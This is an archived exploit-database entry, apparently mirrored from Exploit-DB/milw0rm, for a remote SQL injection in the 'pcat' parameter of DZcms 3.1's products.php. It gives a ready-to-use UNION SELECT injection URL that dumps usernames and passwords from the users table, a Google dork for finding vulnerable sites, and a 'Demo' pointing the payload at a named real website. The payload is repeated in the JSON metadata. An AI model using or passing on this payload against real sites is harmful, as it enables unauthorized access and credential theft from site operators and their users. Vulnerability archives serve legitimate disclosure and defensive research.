Search...

DZcms 3.1 products.php pcat Remote SQL Injection Vulnerability

2009-01-11T00:00:00

ID EDB-ID:7722
Type exploitdb
Reporter Glafkos Charalambous
Modified 2009-01-11T00:00:00

Description

DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            Application: DZcms v.3.1
Vendor Name: CyDezines
Vendor Url: http://www.cydezines.com
Bug Type: dzCMS SQL Injection Vulnerability
Exploitation: Remote
Severity: High
Solution Status: Unpatched
Google Dork: "Powered by DZcms"

POC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*

Demo:
http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*

Credits: Glafkos Charalambous
glafkos [at] astalavista [dot] com

# milw0rm.com [2009-01-11]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:7722", "type": "exploitdb", "bulletinFamily": "exploit", "title": "DZcms 3.1 products.php pcat Remote SQL Injection Vulnerability", "description": "DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2009-01-11T00:00:00", "modified": "2009-01-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/7722/", "reporter": "Glafkos Charalambous ", "references": [], "cvelist": [], "lastseen": "2016-02-01T03:53:32", "viewCount": 8, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-01T03:53:32", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T03:53:32", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/7722/", "sourceData": "Application: DZcms v.3.1\r\nVendor Name: CyDezines\r\nVendor Url: http://www.cydezines.com\r\nBug Type: dzCMS SQL Injection Vulnerability\r\nExploitation: Remote\r\nSeverity: High\r\nSolution Status: Unpatched\r\nGoogle Dork: \"Powered by DZcms\"\r\n\r\nPOC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*\r\n\r\nDemo:\r\nhttp://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*\r\n\r\nCredits: Glafkos Charalambous\r\nglafkos [at] astalavista [dot] com\r\n\r\n# milw0rm.com [2009-01-11]\r\n", "osvdbidlist": []}